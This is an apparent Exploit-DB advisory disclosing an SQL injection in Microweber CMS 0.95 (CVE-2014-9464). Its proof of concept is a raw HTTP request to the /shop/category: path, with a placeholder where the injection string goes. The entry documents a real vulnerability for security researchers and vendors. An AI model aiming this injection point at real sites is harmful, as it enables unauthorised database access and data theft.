Microweber CMS 0.95 - SQL Injection

EDB-ID:

35720




Platform:

PHP

Date:

2015-01-07


# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464

::PROOF OF CONCEPT::

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464

::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.